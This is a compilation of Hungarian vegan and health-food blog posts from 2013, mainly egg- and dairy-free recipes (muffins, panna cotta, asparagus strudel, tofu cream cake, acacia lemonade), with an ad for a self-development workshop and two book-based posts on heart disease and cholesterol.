A muffin készítést pepecselős dolognak tartottam addig, amíg családi nyomásra néhány hete rávettem magam, hogy kipróbáljak egy receptet. Azóta tudom, hogy a muffint a lusta cukrászok találták ki. Fél óránál kevesebb konyhai tevékenységgel, otthon sztárséfnek lenni nem rossz teljesítmény. Mindezek eltörpülnek amellett, hogy tökéletes muffint lehet alkotni anélkül, hogy tojást vagy tejet használnánk a tésztához. Az eredeti recepthez képest a cukor mennyiségét felére csökkentettem, így is elég édes volt, de ez ízlés kérdése. Hozzávalók: (a muffin forma méretétől függően 10-12 db lesz belőle)
- 1,5 csésze liszt
- 1/4 csésze kakaópor (jó minőségű, nem cukrozott)
- 1/2 csésze cukor (lehet barna, vagy nád is)
- 1 csapott teáskanál szódabikarbóna
- 1 csipet só
- 1 csésze kávé (lefőzött kávé helyett használható egy teáskanálnyi granulátum egy csésze meleg vízben elkeverve.)
- 1 evőkanál almaecet
- 2 teáskanál vanília kivonat
- 6 evőkanál olívaolaj
Így készítsd el:
- Melegítsd elő a sütőt 180-190°C-ra, kend át a muffin sütőformát vékonyan egy kis olajjal (ha az anyaga szilikon, vagy tapadásmentes felülettel van bevonva, akkor nem kell).
- Keverd össze egy tálban a lisztet, a kakaóport, a cukrot, a szódabikarbónát, és a sót.
- Egy kisebb edényben elegyítsd az ecetet, az olívaolajat, a vanília kivonatot, majd öntsd a száraz hozzávalókhoz és csak annyira keverd el, hogy a liszt ne maradjon szárazon.
- A muffin sütő mélyedéseit kétharmadig töltsd fel, hogy a tészta szépen meg tudjon nőni sütés közben. 15-18 percig süsd a tésztát, amit az utolsó pár percben érdemes egy fogpiszkálóval, vagy vékony bambusz grillpálcával megszúrni. Ha a pálcikára már nem tapad tészta, elkészült a sütemény.
- A muffinokat sütőrácsra teszem, hogy szabadon hűlhessenek ki.
Panna Cotta Eperkrémmel
2013. június 23. Fittanyuka Blog
Ezzel az toszkán eredetű desszerttel térek vissza rövid szabadságom után, igazán nyárias desszert, finom, könnyű és jól behűtve tálalható! Természetesen ez a verzió teljesen megreformált: tej,-tojás és cukormentes, a panna cotta pedig amúgy is gluténmentes. Könnyen elkészíthető, gyors recept, a hűtési időt kell kivárni csupán. A panna cotta jelentése: Főzött tejszín, főtt tejszín... Hozzávalók: 6 kis csészével 400 ml vaníliás rizs tej 400 ml kókusztejszín 2 teáakanál agar-agar ( vagy más növényi zselésítő) 1 kk vanília őrlemény csipet himalaya só 2 evőkanál méz 1-2 evőkanál nyírfacukor ( az édesítés ízlés szerint, a méz kihagyható) Eperkrém: ( Elég tálalás előtt elkészíteni) 350 g friss eper 1 evőkanál nyírfacukor vagy méz 1/2 citrom leve és reszelt héja 200 ml kókusz tejszín 1 kk agar-agar vagy útifűmaghéj őrlemény A megmosott, tisztított epret a többi hozzávalóval krémesre turmixoljuk. Panna Cotta elkészítése: A kókusztejszínben elkeverjük a vaníliát, a mézet, nyírfacukrot és felmelegítjük, hogy a nyírfacukor feloldodjón. A rizstejben pedig hidegen elkeverjük az agar-agart és állandó keverés mellett, lassú tűzön felforraljuk. Amikor elérte a forráspontot lehúzzuk a lángról és állandó keverés mellett a kókusztejszínes egyveleghez öntjük, lassú tűzön, állandó keverés mellett újra felforraljuk. Kis kávés vagy pudingos csészéket átöblítünk vízzel. Tipp: Frissen tartó fóliával is kibélelhetjük a pohárkákat, hogy biztosan kiboruljanak. Állandó keverés mellett kicsit hűtjük a masszát, majd még melegen ( nálam forró volt, de nem tűzforró), beleöntjük a pohárkákba és négy óra hosszára a hűtőszekrénybe tesszük. Desszertes tányérra borítjuk a kihűlt panna cottakat és az eperkrémmel tálaljuk. Fittanyuka
Zöldséges batyu, kínai beütéssel
2013. június 21. Mindennapi ételeink
Óriási tál salátával megfelelő ebéd, meleg napokon is. Hozzávalók: 1 csomag Tante Fanny leveles tészta 3 gerezd fokhagyma 2 szál újhagyma 4 szem kisebb sárgarépa 15 dkg zöld hüvelyű zöldbab 10 dkg káposzta 15 dkg füstölt tofu 1 kis csokor koriander 3 tk. szárított petrezselyem 3 tk. ánizs 3 tk. szárított édeskömény mag, darálva 3 tk. pirospaprika 3 ek. 100% extra szűz olívaolaj víz-amennyit felvesz só-ízlés szerint -- 3 ek. liszt 3-4 ek. zabtejszín 2 ek. szójaszósz -- szezámmag Elkészítés: Az újhagymát felkarikázzuk és víz +olaj keverékén megpároljuk, majd rátesszük az előre megmosott, meghámozott és julienre vágott sárgarépát, a hasonló méretűre vágott zöldbabot, és a káposztát, majd meglocsoljuk annyi vízzel, amennyi épp csak ellepi. Ekkor hozzáadjuk a pirospaprikát, a fűszereket, fokhagymát. Roppanósra pároljuk a zöldségeket, majd hozzáöntjük a zabtejszín + szójaszósz + liszt keverékét. Ez besűrűsíti annyira, hogy ne folyjon ki a tésztából. Hozzávágjuk a koriandert. A sütőt 220 fokra előmelegítjük, majd a tésztát kihajtjuk, téglalapokat vágunk, melyek felére kanalazunk a tésztából, majd a másik oldalán 3 csíkot vágva ezt az oldalt ráhajtjuk. Olajjal megkenjük, szezámmaggal megszórjuk, és 200 fokon kb. 30 perc alatt készre sütjük (félidőben kisebbre vesszük a lángot). Akinek nincsenek otthon egzotikus fűszerei, az készítheti borsikafű-majoranna-pirospaprika-fohagyma hozzáadásával. Ez esetben nem kínai batyu lesz :)
Spárgával töltött rétes
Ismét egy spárgás étel. A spárga első írásos nyomait Hippokratész műveiben találhatjuk meg. I.e. 460-370 körüli években már hasznosították, de elsősorban gyógyászati szempontból és nem a mindennapos étel-készítéshez. Csak a római kultúrában kezdett elterjedni ételként való használata. Elsősorban előételek alapanyagaként fordult elő. Augustus császárnak volt szokása a rövid idő alatt elvégezhető dolgokra mondani, hogy gyorsabban elkészül, mint ahogy a spárga megfő. XVI. Lajos udvarában pedig már a zöldségek királyaként nevezték a spárgát. A király annyira kedvelte, hogy üvegházakban termesztetett spárgát, így egész évben elérhető volt. Napjainkban már jóformán egész évben hozzájuthatunk a friss csirághoz, de tény, hogy időszakát most "éli", mondhatni a medvehagyma-szezon után spárga-szezon köszönt be. Végül utolsó érdekesség, hogy felénk elsősorban sós ételeket készítenek belőle, Kínában viszont édesség alkotására használják fel.
A recept:
Hozzávalók:
- 1 csomag réteslap
- 40 dkg roppanósra párolt zöld spárga
- ételízesítő vagy só
- fokhagyma
- olaj
- növényi tejföl
- búzadara (tönköly búzadara volt)
Elkészítés:
A spárgákat megpucoljuk, megmossuk, feldaraboljuk, majd enyhén sós vagy ételízesítős kevés vízben aprított fokhagymával puhára pároljuk.
A réteslapokat két részre választjuk. 3-3, vagy 4-4 lapra, így két rúd rétesünk lesz. A réteslapokkal nedves konyharuhán dolgozunk. Mindegyik réteslapot kicsit megkenjük olajjal és így tesszük rá a következő réteslapot. A legfelső réteslapot is enyhén megolajozzuk, megszórjuk egy kevés búzadarával, majd a kiterített rétes egyik részében "elsimítjuk" a spárgákat. Előzőleg napraforgóból (vagy más magból) elkészített növényi tejföllel kenjük meg a spárgák tetejét, majd a rétest felcsavarjuk és tepsibe tesszük. Ugyanezt megismételjük a másik adag réteslappal. Mielőtt megsütnénk, szintén egy kevés olajjal megkenjük a rudak tetejét. Kb. 20 perc alatt szép barnára sül. Melegen és hidegen tálalva is finom ízélményt nyújtanak ezek a kalóriaszegény falatok.
Spárgakrémleves
Könnyű, finom, gyors leves a krémlevesek világából, amely akár hétköznapi vagy hétvégi ebéd alkalmából is elkészíthető.
A spárgában megtalálható jelentős mennyiségű fruktooligoszacharidoknak köszönhetően a bélflórára jótékony hatással van, mivel a hasznos lactobacillusok növekedését serkenti a vastagbélben.
A recept:
Hozzávalók:
1/2 kg zöld spárga
3.4 szem burgonya (nekem újkrumpli volt)
medvehagyma vagy fokhagyma
ételízesítő
víz
zeller
növényi tejszín
Elkészítés:
A spárgát és a krumplikat megpucoljuk, majd feldaraboljuk, megmossuk és egy kevés ételízesítős vízben puhára főzzük. Miután megpuhult, turmixgépbe tesszük a főzőlé egy részével. Hozzáadjuk a hagymát és a zellerleveleket, és összeturmixoljuk - jó alaposan. Átszűrjük a főzőléhez keverve, majd igény esetén növényi tejet/tejszínt keverünk hozzá.
A spárga-fejeket különválasztottam, a krémlevesben főztem meg roppanósra, így még tartalmasabb volt a leves, bár ez a képen épp nem látszik. Pirított kenyér-háromszögeket ettünk hozzá.
Az önmegvalósítás művészete - út a boldogsághoz
2013. június 15. Gitta nyersétel blogja
Szerintem ez az a téma, ami mindenkit érdekel. Én ott leszek ezen az inspiráló tréningen, és abban is biztos vagyok, hogy kihat egész további életemre. Gyere el te is, tapasztaljuk meg együtt, hogyan lépjük át belső korlátainkat! Természetesen nyers ételekkel várjuk a résztvevőket, ebéd, és némi rágcsálnivaló, turmix, és tisztított víz, amit a Nyersétel Akadémia biztosít. Ki az, aki nem szeretné tudni, hogy milyen út vezet önmagunk kiteljesedéséhez és a teljes boldogsághoz? Van egyáltalán ilyen út? Van módszer, ami mindenki számára használható? Hogyan oldhatnánk meg magánéleti, vagy munkahelyi problémáinkat? A boldogságot mindannyian kívülről várjuk, hogy történjen velünk valami, amitől boldogok leszünk. A kulcs pedig éppen itt van! Meg kell tanulnunk felfedezni a boldogságot önmagunkban, ott, mélyen, legbelül. Ebben segít ez az egy napos tréning, amit a Nyersétel Akadémián tart egy kitűnő szakember, Heller Balázs. Heller Balázs Fedezd fel az öntudatra ébredés, az önmegvalósítás útját belső szabadságod felé! Heller Balázs (http://www.balazsheller.com/), Jóga Asana Európa bajnok, és Life Coach három fogásos nyers vegán ebéddel egybekötött hét órás személyiség-fejlesztő tréningjén! Helyszín: Budapest, Nyersétel Akadémia (http://www.nyersetelakademia.hu/), Budapest, XIII. Tátra u. 11. Időpont: 2013. július 13. 10.00-18.00 óra. 1. KIHEZ SZÓL AZ ELŐADÁS? Ez az előadás a LELKEDhez szól, hogy képes legyél ÁTLÉPNI a materiális világunk korlátain, hogy a boldogságot már ne a külvilágban, de ott mélyen legbelül, önmagadban FEDEZD FEL. Az előadáson elhangzó inspiratív gondolatok, tanítások és gyakorlati útmutatások SZEMBESÍTENEK önvalóddal, hogy az öntudatra ébredéssel a korlátlan belső szabadságod fellegébe SZÁRNYALJ. Sok szeretettel várunk minden kedves érdeklődőt korhatár nélkül, hogy megtedd az első lépést a változáshoz, hogy SZEMBESÜLJ és MEGOLDÁST TALÁLJ az élet adta nehézségekre, legyen az a párkapcsolat, család, karrier, betegség, belső korlátaink, félelmeink, bizonytalanság, kilátástalanság, útkeresés vagy pusztán önismeret. Az önmegvalósítás művészete az ÉLET művészete, melynek alkotója kizárólag TE lehetsz! Alkossunk együtt! Ahhoz, hogy megtudd mi vagy, előbb fel kell fedezned, mi nem vagy. És, hogy megtudd mi nem vagy, előbb gondosan figyelned kell magad, visszautasítva mindent, ami nem jár szükségszerűen együtt azzal az alapvető ténnyel, hogy: vagyok. Minél világosabban megérted, hogy az elme szintjén csak tagadó kifejezésekkel írhatod le magad, annál gyorsabban érsz a keresés végére és ismered fel, hogy lényed korlátok nélküli. - Sri Nisargadatta Maharaj 2. VÉLEMÉNYEK, TAPASZTALATOK Egy nagyon érdekes előadás, hogy megtanuld értékelni az élet szépségét. Mindenkinek ajánlom ezt az előadást, aki a Belső Béke útjára kíván lépni. Hatékony előadás, mely szembesít az élet értelmével, értékeiddel. Szívből ajánlom mindenkinek Balázs segített felfedezni értékrendszeremet, melynek köszönhetően képessé váltam kapcsolatba lépni a lelkemmel, az igaz énemmel . Amennyiben keresed helyed e világban, ne hagyd ki ezt az előadást. 3. AZ ELŐADÓRÓL Heller Balázs (http://www.balazsheller.com/) legfőbb hivatásának az emberek inspirálását, motiválását tekinti előadásain, írásain, jóga óráin, meditációin, jógatáborain keresztül. Balázs 7 évesen kezdett el szertornázni, amit egészen 13 évig profi szinten űzött. Többszörös országos ifjúsági bajnokként és magyar válogatottként sok helyen járt a világban, majd az USA-ban, Franciaországban edzősködött. A torna után egyenes út vezetett a jóga világába. 2009-ben Dublinban elnyerte a Jóga Asana Európa bajnoki címet, majd családjával Máltára költözött, ahol létrehozta holisztikus jóga-fitnessz központját, ahol mind a mai napig privát és csoportos önismereti tréningeket, a vegán táplálkozásról szóló előadásokat, jóga és fitness órákat tart. Balázs emellett rendszeresen tart jóga életmód táborokat, amely nemcsak a jógáról, de a személyiségfejlesztésről, a vegán életmódról és az öntudatra ébredésről is szól. 2009 óta life coachként (életvezetési tanácsadóként) dolgozik. 4. JELENTKEZÉS ÉS FOGLALÁS A tréning maximum létszáma: 20 fő. Jegyár: 11 900Ft, ami tartalmazza az ebéd és az uzsonna árát. A tréningen való helyfoglalás és részvétel regisztrációhoz kötött, a jelentkezést a következő címre várjuk: trening.regisztracio@yahoo.com
A szívbetegségről - III. rész és a koleszterin
A szív- és érrendszeri betegségek Amerikában minden második ember életét követelik. De van jó hír is. E halálesetek szinte mindegyikénél a fő tényező az ateroszklerózis - ez pedig egy olyan állapot, ami az orvostudomány szerint megelőzhető, kezelhető, sőt visszafordítható. Pillantsunk a kényszerítő erejű bizonyítékokra, melyek kulcsot adnak a kezünkbe egy olyan életmódprogramhoz, ami legyőzi az érelmeszesedést. Először a szívbetegség megelőzésére összpontosítunk, de legyünk tudatában annak, hogy a megelőzést jelentő tényezők segítenek célba venni az ateroszklerózist valamennyi változatában és a test minden területén.
Összpontosítsunk a koleszterinre! A koleszterin, a szívbetegségben betöltött különleges szerepe miatt elsődleges jelentőségű. Ezért itt most erre összpontosítunk. Mielőtt azonban azt a benyomást keltenénk, hogy ez az egyetlen olyan dolog, ami összefügg a szívbetegség kockázatával, hangsúlyozom, hogy a koleszterin fontos, nélkülözhetetlen természetes vegyület. Ezt a fehér, viaszos zsiradékot testünk gyártja, és arra használja, hogy sejtfalakat építsen, és bizonyos hormonokat készítsen. Azonban a vérkeringésben lévő túl sok koleszterin (szérumkoleszterinnek is nevezik) hozzájárulhat az ateroszklerózis kialakulásához. Éppen ezért a magas vérkoleszterinszint, mint önálló tényező, összefüggésben van a szívkoszorúér-megbetegedések okozta halálozási aránnyal. Javallott, hogy minden húsz év fölötti tudja, mennyi a teljes vérkoleszterin- és HDL-szintje.
Hogyan tudunk változtatni ezeken az igen magas koleszterinszinteken, melyek évente sok százezer fölösleges halálesettel hozhatók összefüggésbe? A japán példa tanulmányozása némi betekintést enged ebbe. Japán a skála alján volt a szívbetegség tekintetében, noha a dohányzók aránya jóval magasabb, mint az Egyesült Államokban. Dohányzás szempontjából Japán a 10. a világon, a japán férfiak 59%-a és a nők 14%-a dohányzik. Az Egyesült Államok a 78. helyen áll. Az amerikai férfiak 28%-a és az amerikai nők 23%-a dohányzik. Akkor miért alacsonyabb a szívmegbetegedési arány Japánban, mint az USA-ban? Úgy tűnik, hogy ez az átlagosan jóval alacsonyabb koleszterinszintnek köszönhető. A japán statisztikák arra szolgáltatnak bizonyítékot, hogy világméretű skálán a koleszterin a szívbetegség szempontjából a legfontosabb kockázati tényező. Az a férfi, akinek a szérumkoleszterinje 240 mg/dl (vagy 6,2 mmol/l) felett van, több mint háromszor esélyesebb arra, hogy szívbetegségben fog meghalni, mint az, akinek kevesebb 200 mg/dl-nél. A szívbetegség és az ateroszklerózis a nyugati országokban igen korán elkezdődik. Harmincéves, sőt még ennél is fiatalabb egyéneknél állapították meg szinte egyöntetűen, hogy ateroszklerotikus zsírréteg-üledékek vannak artériáik belső falán. A fal befedett területének mérete nagyobb az ilyen életkorú magas koleszterinszintű személyeknél. Akinek 230 a koleszterinszintje, véredényei felszínének több mint 50%-át fedik le korai ateroszklerotikus zsírrétegek. Ez durván ötször annyi zsíros felépítmény-mennyiség, mint azé az emberé, akinek a koleszterinszintje szinte ideális: 110. A bizonyíték egyértelmű: a magas vérkoleszterin károsítja az artériákat még harmincévesnél fiatalabb egyéneknél is. Néhány ember tévesen úgy gondolja, hogy a szívbetegség az idősekre korlátozódik, de az összes szívroham 5%-a negyven éven aluliaknál és 45%-a hatvanöt évesnél fiatalabb embereknél következik be.
Milyen az ideális koleszterinszint? Néhány szakértő évek óta állítja, hogy az ideális koleszterinszint: 100 + az életkorunk. Ez az érték attól függ, hogy a kérdést milyen szempontból vizsgáljuk. Két példa talán segít. Az egyik, hogy amikor nemzetközi összehasonlításokat végeznek azok az országok, ahol igen alacsony a szívbetegség kockázata, a 100 + életkorunk értékét hajlamosak ideális koleszterinszint-átlagnak tekinteni. A másik: széles körben gyűjtöttek adatokat az Egyesült Államok lakosságáról a Multiple Risk Factor Intervention Trial (MRFIT) során (sokszoros kockázatitényező-befolyásolási kísérlet). A megvizsgált több mint 300000 férfi között a szívbetegségből származó kockázat akkor kezdett növekedni, amikor a teljes koleszterin meghaladta a 150 mg/dl-t. Ez a 150-es koleszterinszint messze az Egyesült Államokban lévő 200-as szint alatt van, amit a legtöbb ember tévesen ideálisnak gondol. Továbbá a 150-es szint egy 100 + átlagos 50 éves korú értékét mutatja - ez alkalmas vezérfonal olyan korosztály számára, amely inkább tudatában van a szívbetegség rá vonatkozó kockázati tényezőinek, mint a fiatalabbak. A National Cholesterol Education Program (nemzeti oktatási program a koleszterinről; a továbbiakban NCEP) első jelentéséből sok zavar származott. Közegészségügyi célról gondoskodott, amikor azt javasolta, hogy a koleszterinszint értéke 200 mg/dl-nél kisebb legyen. Ez a szint kitűnő érték, hogy minden amerikai elé elérendő célként állíthassák a közegészségügyi dolgozók és egészségpolitikát tervezők, ha figyelembe vesszük, hogy 97,2 millió amerikai (a felnőttek 52%-a) szérumkoleszterinje 200 mg/dl érték felett van. Valóban, ha minden amerikai polgár erre az értékre csökkentené koleszterinjét, sok ezer élet menekülne meg. Ha Ön a szívbetegség legkisebb kockázatával sem szeretne számolni, legyen bölcsebb: személyes célként tűzze ki a 100 + életkor szintet. Óriási a különbség a lakosság számára előirányzott cél és az optimális koleszterinszint elérését célul tűző személyes vállalás között. Egy másik probléma az, hogy az útmutató nem vette figyelembe a koleszterin valamennyi fontos altípusát. (Ezt szerencsére helyesbítették a National Cholesterol Education Program Expert Panel. Következő egészségügyi leírásban erről lesz szó.
(Döntő bizonyíték könyv)
Málnás - epres krémmel töltött torta (tej- és tojásmentes!)
Még Húsvétkor készült ez a több szempontból is különleges torta, és mivel lassan vége az eperszezonnak, talán éppen itt az ideje, hogy végre felkerüljön ide a blogra is!:) A tortához tartozó eredeti receptet lassan 3 éve, hogy megláttam az olasz Veganblog oldalán (na, ja nem siettem el...:)))), és akkor rögtön elhatároztam, hogy már pedig én szerzek ilyen tortaformát, és megcsinálom!:) Nagy meglepetésemre nem is kellett sokat keresnem, mert az Interspar edény-osztályán meg is találtam (mostanság is láttam belőle, a bejegyzés megírásakor, 4.500 Ft körüli áron). Ez egy olyan szuper Zenker kombinált tortaforma, ami 3 verzióban is felhasználható, tehát gyakorlatilag 3-féle tortaformát veszünk egyszerre:): Fotók: Zenker A másik újdonság ezzel a recepttel kapcsolatban az volt számomra, hogy életemben először próbáltam ki a selyem tofut. Hát, mit mondjak, igen sokat kellett rajta dolgozni, hogy eltüntessem az alapból nem kicsit keserű ízét... Az állaga viszont valóban kiváló pl. a krémsajtokat helyettesítendő receptekhez! A selyemtofut egy bioboltban vettem, és hát elég borsos volt az ára...:/ A torta nagyon dekoratív volt, és ízre is finom, a húsevő vendégek meglepődtek, amikor elárultam, hogy tofu van a krémben...:) A gyerekek is szívesen ették!:) Az eredeti tortareceptet több ponton is átdolgoztam a saját elképzeléseim, ízlésünk szerint, ide már így írom le. A piskóta-alapot pl. egy jól bevált recept szerint készítettem. A módosításokat akkor sajnos nem jegyeztem fel, és mivel elég sok idő telt el már azóta, bocsánat, hogy csak kb. értékek is idekerülnek!:) Málnás-epres krémmel töltött torta Hozzávalók (egy 26 cm-es tortaformához): Piskóta alap 500 ml növényi tej (nálam most rizstej) 200 g nádcukor 1 citrom leve és héja 2 teáskanál vaníliakivonat, vagy 2 cs. bio vaníliás cukor 500 g bio liszt (fele sima, fele teljes kiőrlésű, vagy 100% teljes kiőrlésű) 2 cs. foszfátmentes borkő sütőpor 2 mk. szódabikarbóna 12 ek. olaj Epres krém 200 g selyem tofu + citromlé, hogy elvegye a tofu keserű ízét (ha jól emlékszem, talán majdnem 1 egész citrom leve belement, de kezdd kevéssel, és folyamatosan kóstolgasd, ahogy adagolod!!) 100 g növényi tejszín agave szirup ízlés szerint (az eredeti receptben 4 ek., de nekem az elég kevés volt, utána meg csak öntöttem, nem mértem, bocsi!:) 100 g eperpüré (az epret egyszerűen összeturmixoltam egy kis vízzel) 300 g cukormentes málnalekvár (pl. a DM-ből) 2 kávéskanál agar-agar Díszítés nádporcukor (el is hagyható akár!) olvasztott étcsokoládé 20 db málna A piskótatésztához összekeverjük a tejet, a cukrot, a vaníliakivonatot, a citromlevet és az olajat, egy másik tálban pedig a lisztet, a sütőport és a szódabikarbónát, majd mind a kettő keveréket vegyítjük egymással. A tortaformát alját, oldalát jó alaposan bezsírozzuk és belisztezzük, majd 200 fokra előmelegített sütőben kb. 25 percig sütjük. Mielőtt kiszedjük a kész piskótát a tortaformából, hagyjuk kihűlni, mert különben beleszakadhat a tészta a formába! A tészta kiszedésénél esetleg egy tompa végű kést óvatosan a szélek alá csúsztathatunk, főleg a forma középső, mélyebb részére eső tortadarabnál legyünk nagyon óvatosak! Melegítsük össze a lekvárt egy kis lábasban egy kávéskanál agar-agarral, forraljuk fel és folyamatos keverés mellett, lassú tűzön főzzük kb. 1-2 percig, majd öntsük a keveréket a torta középső mélyedésébe. Szitáljunk egy kis nádporcukrot a torta peremére. Turmixoljuk össze a selyem tofut a növényi tejszínnel, az eperpürével, az agave sziruppal és a másik kávéskanál agar-agarral. Öntsük át egy kis lábasba, forraljuk fel, és állandó keverés mellett főzzük még kb. 2 percig, utána öntsük a torta közepére. Vízgőz fölött megolvasztjuk az étcsokit, és pl. egy nylon zacskóba töltve, aminek a sarkán vágunk egy nagyon pici lyukat, kidíszítjük vele a piskóta peremét. A málnát összeturmixoljuk és ezzel a málnapürével készítjük el a málnás keretet az epres tofukrém tetején. Az olvasztott csoki befelé folyik a tortakrém felé, ezért a málnapürét utoljára öntsétek a tortára, hogy az esetleges csoki-túlfolyásokat eltakarjátok vele!:) Díszítés tetszés szerint, málnaszemekkel a tetején, és akár egy szép selyemszalaggal az oldalán, ahogy Barbara tette (nekem sajna arra már nem volt időm).
A szívbetegségről - I. rész
Sue sohasem aggodalmaskodott túl sokat a szívbetegség miatt. Igaz, édesapja 45 éves korában szívroham következtében halt meg, de azt mindenki tudja, hogy a női nemi hormonok védenek a szív megbetegedéseitől, legalábbis addig, amíg a klimax be nem következik. Egy éjszaka azonban Sue rádöbbent a valóságra. Fiatalabb húga 40 éves korában meghalt első szívrohamában, még a változás kora előtt. Sue hirtelen szembetalálta magát azzal, amitől legbelül mindig is félt: őt is érheti szívroham.
Szinte minden amerikai ismer valakit, aki szívbetegségben halt meg. Csakúgy, mint Sue, elveszíthetjük közeli hozzátartozónkat e miatt a rettegett kór miatt. Talán vannak szomszédaink, barátaink, munkatársaink, akiket szívbetegség ragadott el. E gyilkos uralmának eredményeként közülünk többen - legalábbis alkalmanként -felteszik a kérdést: ,,Lehet, hogy én leszek a következő?" Az efféle aggodalmak jogosak. A szívbetegség az iparosodott országokban az első számú gyilkos. A népszerű téveszmékkel ellentétben a szívbetegség nem csak a férfiak betegsége. Amerikában a szívbetegség a vezető halálozási ok férfiak és nők körében egyaránt. Mindannak ellenére, amit az orvostudomány tud arról, hogyan előzhető meg ez a betegség, a legfrissebb statisztikák azt mutatják, hogy egyedül az Egyesült Államokban 1994-ben több mint 954 00C ember halt meg szív- és érrendszeri betegségekben, míg 1992-ben 925 000-en. Minden 33. másodpercben egy amerikai kardiovaszkuláris betegségben hal meg. 1900 óta mindig - 1918-at kivéve - a kardiovaszkuláris betegség volt az Egyesült Államokban az első számú gyilkos. Amikor egy repülőgép lezuhan az USA-ban, és százak halnak meg, az újságok napokig címoldalon foglalkoznak az esettel. Nagyon alapos elemzést végeznek, közhírré teszik a szerencsétlenség lehetséges okát és azt, hogyan lehetett volna megelőzni. Vegyük fontolóra, hogy hozzávetőlegesen kétezer-hatszáz haláleset fordul elő naponta az Egyesült Államokban csak kardiovaszkuláris betegségtől, s közülük sok olyan hirtelen következik be, mint egy légi katasztrófa. Ez több, mint tíz Jumbo-katasztrófa naponta. E halálesetek még csak nem is jelennek meg a hírek között, kivéve, ha egy híres személy hal meg szívroham következtében. Ha a betegséget egyáltalán megemlítik, azt is csak úgy, mintha elkerülhetetlenül következett volna be. Ez a halálok több figyelmet érdemelne.
Szomorú, de a halálesetek e rémisztő betegségnek nem egyedüli negatív következményei. A kb. 258 milliós amerikai lakosságból 57 millió embernek ilyen jellegű betegsége van. Amerikának évente a szív- és érrendszeri betegségek döbbenetes módon 259,1 milliárd dollárjába kerülnek, ami nemcsak az orvosi és sebészeti beavatkozásokat és kezeléseket tartalmazza, hanem a munkaerő-kiesést is. Ha valaki történetesen átél egy agyvérzést, ennek költségei egy átlagos életkorú ember esetében az egészségbiztosítási számlákon és kereseti kiesésben 103 576 dollárt tesznek ki. Mennyivel jobb megelőzni az agyvérzést vagy szívrohamot, mint fizetni valakinek, és mégis szenvedni a betegségtől és az azt biztosan követő gyengébb életminőségtől! Nem csoda, hogy Clyde Yancy dr, az Amerikai Szívtársaság dallasi divíziójának elnöke, a dallasi Texas South-western Medical Center egyetemén kutató kardiológus nemrég azt mondta: ,,Nem számít, hol tart valaki felnőtté válása folyamatában, középkorú vagy öreg: a szív szempontjából egészséges életmód vállalása a leghatékonyabb dolog, amit azonnal megtehet." Nemcsak a leghatékonyabb, de igen fontos is, sőt valószínűleg életmentő és minden bizonnyal élettartam-növelő!
Hogyan lehet a szívrohamok számát csökkenteni? Mit tehet az ember, hogy a szívroham esélyét csökkentse? Dr. Gyárfás Iván, az Egészségügyi Világszervezet kardiovaszkuláris betegségmegelőző programjának vezetője úgy magyarázza, hogy a megelőzésre vonatkozó lépések, rendelkezések jelentős számú embert meg tudnának menteni az idő előtti, korai haláltól: ,,Világszerte évente körülbelül 12 millió ember hal meg szívproblémától, de több mint a fele életben maradhatna, ha jobb megelőzési programok működnének."
A jobb megelőzési programok kb. 50%-kal vissza tudnák szorítani a szívbetegségből eredő (főleg a szívkoszorúér megbetegedéséből származó) halálozások számát, sőt a bizonyítékok azt mutatják, hogy optimális prevenciós programokkal akár kilencven százalékkal is vissza lehetne szorítani az esetek számát. Röviden: noha a szívbetegség messze a legfőbb halálozási ok Amerikában, nem kell annak lennie. Tíz szívrohamból kilenc megelőzhető!
A bejegyzés alapjául a "Döntő bizonyíték" c. könyv szolgált.
ÉDESANYÁM BORSÓLEVESE
2013. június 2. Mit főzzek holnap?
Akácos limonádé
Még nem mosta el talán mindenütt a pihe-puha akácvirágokat a minden nap ránk köszöntő eső. Nincs is különösebb bajom az esővel, főként, hogy a májusi eső aranyat ér, és szerintem az utóbbi 10-12 napban ezt az aranyat hozó áldást nap, mint nap megtapasztalhattuk. Tény, hogy jobban örülnék, ha csak este esne és a Nap meleg fényét élvezhetnénk a világos órákban felhőtlenül. Az előző bejegyezésemben egy újabb bodzalimonádéval csalogattam elő a napsugárzást. Most egy újabb recepttel, képpel üzenek neki, hogy ideje visszatérnie és igazi nyárral megajándékoznia. A recept: Hozzávalók: - 1 db 5 literes üveg - kb. 10 fürt frissen szedett akácvirág - esetleg pár szál bodzavirág - 1-2 narancs - pár szál menta levelei - és ha van virága - méz (akácméz teszi igazán finommá) vagy más édesítő (pl: gyümölcscukor, barnacukor, stb.) elhagyható - 3 dl meleg víz (nem forró) - 4 l víz (ha melegebb italt szeretnénk, a víz is lehet melegebb, de ne forró, hideg ital esetén pedig normál víz) - esetleg jégkocka Elkészítés: Fogunk egy 5 literes dunsztos üveget, akárcsak a bodzalimonádéknál. A leszedett akácvirág-fürtöket átnézzük, nincs-e apró kis bogárka megbújva a virágzat között és egy kicsit leöblítjük vízzel. A virágokat az üveg aljára fektetjük. A narancsokat jó alaposan megmossuk és felkarikázzuk, majd a virágok tetejére helyezzük. Ha édesszájú társaságnak készítjük, akkor 2-3 evőkanál mézet (vagy más édesítőt) csurgatunk a narancsokra, de ez el is maradhat. Végül néhány szál mentának leszedjük a leveleit, megmossuk, és ezt is az üvegbe tesszük. Most virágzó fodormentám volt, így a virágát is felhasználtam. Megmostam és az üvegbe tettem. Jöhet a nem forró, de valamennyire meleg víz, ami segít az ízek gyors "összeérésében". Ráöntjük. Fakanállal gyengéden átkeverjük, vagy meglötyögtetjük az üveg tartalmát. Végül további (hideg vagy meleg) vizet öntünk rá. Kistányérral, vagy konyharuhával letakarjuk az üveg tetejét mindig, amikor épp nem fogyasztunk belőle. Frissen szűrjük kancsóba vagy poharakba.
Epres-rebarbarás kompót
Isteni finom lett, sajnos a rebarbarát tovább főztem, mint kellett volna, és szétment, máskor jobban figyelek.
De ez az ízén nem változtatott.
A rebarbarát meghámozzuk, majd feltesszük vízben főni. Csak rövid ideig kell, mert hamar szétmegy… (na, ezt a részét eltoltam …
Miután megfőtt, és kihűlt, tettem bele mézet és egy kis xilitet édesítésnek és vagdostam bele epret. Semmilyen más fűszerezést nem kívánt, de lehet tenni bele fahéjat, szegfűszeget is. Citromot sem igényelt savanyításnak, mert a rebarbara finom savanykás. Bátran ajánlom mindenkinek.
Ezt az egészet smoothie alapanyagként, folyadékként is el tudom képzelni összeturmixolva.
Köszönöm az ötletet Ecsedi Katának!
Almás-leveles szirmok
2013. május 30. Mindennapi ételeink
